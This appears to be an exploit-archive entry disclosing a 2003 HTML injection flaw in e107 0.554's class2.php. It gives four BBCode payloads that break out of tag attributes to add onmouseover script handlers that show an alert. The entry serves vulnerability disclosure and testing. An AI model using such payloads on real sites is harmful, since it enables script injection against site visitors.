e107 Website System 0.554 - HTML Injection

Author: Pete Foster
type: webapps
platform: php
port: 
date_added: 2003-07-25  
date_updated: 2012-11-27  
verified: 1  
codes: OSVDB-2305  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22958.txt  

source: https://www.securityfocus.com/bid/8279/info

The e107 content management system is prone to an HTML injection vulnerability. This issue is exposed through the class2.php script. An attacker may exploit this issue by including hostile HTML and script code in certain fields within the form. This code may be rendered in the web browser of a user who views the site.

[img][/img] - [img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link][/link] - [link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email][/email] - [email]/foo@bar.com" onmouseover="alert('Vulnerable');[/email]
[url][/url] - [url]/url.htm" onmouseover="alert('Vulnerable');[/url]